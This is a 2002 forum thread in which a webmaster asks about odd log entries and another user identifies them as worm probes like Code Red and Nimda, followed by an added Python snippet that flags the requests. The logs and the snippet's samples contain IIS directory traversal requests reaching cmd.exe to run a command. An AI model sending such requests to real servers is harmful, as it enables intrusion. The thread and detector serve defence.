Help with log entries

CSTX

6:51 pm on Mar 18, 2002 (gmt 0)



Can someone tell me what the following log entries mean?
GET /index.cfm FrodoSoft+-+got+an+entry+for+that?++++++++++++
GET /index.html (with same FrodoSoft suffix)
GET /favicon.ico (with same FrodoSoft suffix)
GET /index.asp (with same FrodoSoft suffix)
GET /info/info.cfm (with same FrodoSoft suffix)
GET /msadc/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c%20dir 404 3415 414
GET /wwwroot/ (with same %5c suffix)
GET /cgi-bin (with same %5c suffix)
GET /_vti_bin (with same %5c suffix)
GET /scripts/ (with same %5c suffix)
GET /iisadmpwd/ (with same %5c suffix)
GET /upload.asp
POST /upload.asp

amoore

7:11 pm on Mar 18, 2002 (gmt 0)



They are requests for scripts and stuff that are common security problems. With some installations of webservers, you can break into the system by requesting cleverly formed web pages from the server. Usually, an automated virus or worm makes these requests from a machine that has already been compromised.

Search around for pages on things like "code red" or "nimda" for examples.
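
Added example (not part of the original thread or anyone's post): a small Python check that flags the `..%5c` / `cmd.exe` requests quoted above by decoding the path before matching, so the encoded backslashes are seen as directory separators. The function names and sample lines are constructed for illustration, and the log layout (method, URI stem, then optional fields) is an assumption.

```python
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the shape of the entries quoted in the thread:
# method, URI stem, then optional query/status fields.
SAMPLE_LOG = """\
GET /index.html -
GET /msadc/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c%20dir 404 3415 414
GET /scripts/..%5C..%5Cwinnt/system32/cmd.exe /c%20dir 404
GET /docs/release..notes.html -
POST /upload.asp -
"""

def normalize(path, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), then treat '\\' as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def classify(line):
    """Return (label, normalized_path) for a 'METHOD stem [fields...]' log line."""
    parts = line.split()
    if len(parts) < 2:
        return ("unparsed", "")
    path = normalize(parts[1])
    segments = [s for s in path.split("/") if s]
    traversal = ".." in segments          # a whole '..' segment, not dots in a name
    shell = bool(segments) and segments[-1].lower() == "cmd.exe"
    if traversal and shell:
        return ("traversal-to-cmd.exe", path)
    if traversal:
        return ("traversal", path)
    if shell:
        return ("cmd.exe-request", path)
    return ("no-match", path)

def summarize(log_text):
    """Count labels over every non-empty line of a log."""
    return Counter(classify(l)[0] for l in log_text.splitlines() if l.strip())

if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        print(classify(line)[0].ljust(22), line)
```

Matching on the raw string would miss the `%5c` form, and matching on any `..` would flag ordinary names such as `release..notes.html`; decoding first and comparing whole path segments avoids both.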

CSTX

7:17 pm on Mar 18, 2002 (gmt 0)



Do the FrodoSoft entries (FrodoSoft is a virus) mean that the person accessing the website may have it on his operating system and not know he is infected?